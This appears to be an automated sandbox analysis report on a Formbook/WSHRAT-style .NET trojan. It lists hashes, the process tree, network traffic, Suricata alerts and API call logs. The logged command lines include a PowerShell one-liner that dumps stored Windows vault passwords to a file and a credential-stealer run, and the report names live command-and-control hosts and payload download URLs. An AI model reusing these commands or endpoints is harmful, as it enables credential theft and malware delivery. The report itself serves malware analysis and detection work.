Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 14, 2023, 5:03 p.m.	May 14, 2023, 5:38 p.m.

Size	541.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`c159fc653a86ef3eab80e5d06b9cfa2c`
SHA256	`b6e0c17a224fe0df6f58add122e0420aad76a697c1d7634aa0cfe2f5dc84dc2b`
CRC32	`2F41A001`
ssdeep	`12288:lBXSh9d55EWf6bkHXgtQZDsfDfWXWBt9ExkUp8ZbcoahOOufKlgc+ABeaESJAzEM:7QZQz8Du4`
Yara	Win_Trojan_Formbook_Zero - Used Formbook Is_DotNET_EXE - (no description) PE_Header_Zero - PE File Signature IsPE32 - (no description)

windows.exe "C:\Users\test22\AppData\Local\Temp\windows.exe"
524
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\lRDdN.vbs"
  2072
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\windows.js"
2332
explorer.exe C:\Windows\Explorer.EXE
1236
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\test22\AppData\Local\Temp\tmp.txt"
2352
cmd.exe "C:\Windows\system32\cmd.exe" /c cd "C:\Users\test22\wshsdk" && C:\Users\test22\wshsdk\python.exe C:\Users\test22\rundll > "C:\Users\test22\wshout"
748
- python.exe C:\Users\test22\wshsdk\python.exe C:\Users\test22\rundll
  2488
cmd.exe "C:\Windows\system32\cmd.exe" /c cd "C:\Users\test22\wshsdk" && C:\Users\test22\wshsdk\python.exe C:\Users\test22\rundll > "C:\Users\test22\wshout"
2872
- python.exe C:\Users\test22\wshsdk\python.exe C:\Users\test22\rundll
  1232
cmd.exe "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
1780
- taskkill.exe taskkill /F /IM cmdc.exe
  1596
cmd.exe "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
1716
- taskkill.exe taskkill /F /IM cmdc.exe
  1344
cmdc.exe "C:\Users\test22\cmdc.exe" /stext C:\Users\test22\cmdc.exedata
1868
cmd.exe "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
2576
- taskkill.exe taskkill /F /IM cmdc.exe
  2808
cmdc.exe "C:\Users\test22\cmdc.exe" /stext C:\Users\test22\cmdc.exedata
1700
cmd.exe "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\test22\wshlogs"
2936

Name	Response	Post-Analysis Lookup
vj5566.duckdns.org	A 142.202.242.176	142.202.242.176
pastebin.com	A 104.20.67.143 A 172.67.34.170 A 104.20.68.143	104.20.68.143
ip-api.com	A 208.95.112.1	208.95.112.1
wshsoft.company	A 194.59.164.67	194.59.164.67

IP Address	Status	Action
104.20.67.143	Active	Moloch
104.20.68.143	Active	Moloch
142.202.242.176	Active	Moloch
164.124.101.2	Active	Moloch
194.59.164.67	Active	Moloch
208.95.112.1	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49168 -> 104.20.67.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49165 -> 104.20.68.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:53673 -> 164.124.101.2:53	2042936	ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain	Potentially Bad Traffic
UDP 192.168.56.103:53673 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
TCP 192.168.56.103:49173 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49173 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49173 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49170 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49172 -> 142.202.242.176:6677	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 142.202.242.176:6677	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 142.202.242.176:6677	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 142.202.242.176:6677	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 142.202.242.176:6677	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 142.202.242.176:6677 -> 192.168.56.103:49175	2027449	ET MALWARE WSHRAT Credential Dump Module Download Command Inbound	A Network Trojan was detected
TCP 192.168.56.103:49178 -> 142.202.242.176:6677	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.103:49184 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49185 -> 142.202.242.176:6677	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.103:49184 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49189 -> 142.202.242.176:6677	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.103:49184 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49194 -> 142.202.242.176:6677	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.103:49196 -> 142.202.242.176:6677	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.103:49184 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49188 -> 142.202.242.176:6677	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.103:49184 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49210 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49210 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49211 -> 142.202.242.176:6677	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.103:49211 -> 142.202.242.176:6677	2002023	ET CHAT IRC USER command	Misc activity
TCP 192.168.56.103:49909 -> 142.202.242.176:6677	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.103:49909 -> 142.202.242.176:6677	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49168 104.20.67.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	79:b7:9c:ec:8a:be:ea:82:0d:16:04:fb:46:5f:89:6b:78:b9:43:fd
TLSv1 192.168.56.103:49165 104.20.68.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	79:b7:9c:ec:8a:be:ea:82:0d:16:04:fb:46:5f:89:6b:78:b9:43:fd

Queries for the computername (37 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 14, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 14, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 14, 2023, 5:03 p.m.			0	0
IsDebuggerPresent May 14, 2023, 5:04 p.m.			0	0

Command line console output was observed (28 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: Unable to find type [Windows.Security.Credentials.PasswordVault,Windows.Securit console_handle: 0x00000023	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: y.Credentials,ContentType=WindowsRuntime]: make sure that the assembly containi console_handle: 0x0000002f	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: ng this type is loaded. console_handle: 0x0000003b	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: At line:1 char:107 console_handle: 0x00000047	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: + [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credential console_handle: 0x00000053	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: s,ContentType=WindowsRuntime] <<<< console_handle: 0x0000005f	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: + CategoryInfo : InvalidOperation: (Windows.Securit...=WindowsRun console_handle: 0x0000006b	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: time:String) [], RuntimeException console_handle: 0x00000077	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: + FullyQualifiedErrorId : TypeNotFound console_handle: 0x00000083	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: New-Object : Cannot find type [Windows.Security.Credentials.PasswordVault]: mak console_handle: 0x000000a3	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: e sure the assembly containing this type is loaded. console_handle: 0x000000af	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: At line:2 char:20 console_handle: 0x000000bb	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: + $vault = New-Object <<<< Windows.Security.Credentials.PasswordVault console_handle: 0x000000c7	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: + CategoryInfo : InvalidType: (:) [New-Object], PSArgumentExcepti console_handle: 0x000000d3	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: on console_handle: 0x000000df	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: + FullyQualifiedErrorId : TypeNotFound,Microsoft.PowerShell.Commands.NewOb console_handle: 0x000000eb	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: jectCommand console_handle: 0x000000f7	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x00000117	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: At line:3 char:19 console_handle: 0x00000123	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: + $vault.RetrieveAll <<<< () \| % { $_.RetrievePassword();$_ } > C:\Users\test22 console_handle: 0x0000012f	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: \AppData\Local\Temp\tmp.txt console_handle: 0x0000013b	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: + CategoryInfo : InvalidOperation: (RetrieveAll:String) [], Runti console_handle: 0x00000147	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: meException console_handle: 0x00000153	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: + FullyQualifiedErrorId : InvokeMethodOnNull console_handle: 0x0000015f	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: 2023-05-15 03:04:48,046 - ERROR - Couldn't find credentials file (logins.json or signons.sqlite). console_handle: 0x0000000b	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: ERROR: The process "cmdc.exe" not found. console_handle: 0x0000000b	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: ERROR: The process "cmdc.exe" not found. console_handle: 0x0000000b	1	1
WriteConsoleW May 14, 2023, 5:04 p.m.	buffer: SUCCESS: The process "cmdc.exe" with PID 1868 has been terminated. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 53 events)

Time & API	Arguments	Status	Return
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e4b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e4b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e4b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e4b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e4b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e4b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e3f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051e5f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 14, 2023, 5:03 p.m.		1	1	0

Connects to a Dynamic DNS Domain (1 event)

domain

vj5566.duckdns.org

Performs some HTTP requests (4 events)

request	GET http://pastebin.com/raw/WVFt9GbZ
request	GET http://ip-api.com/json/
request	GET http://wshsoft.company/python27.zip
request	GET https://pastebin.com/raw/WVFt9GbZ

Allocates read-write-execute memory (usually to unpack itself) (50 out of 156 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bc0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00db0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74051000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0039a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74052000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00392000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00467000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0045a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:03 p.m.	process_identifier: 524 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
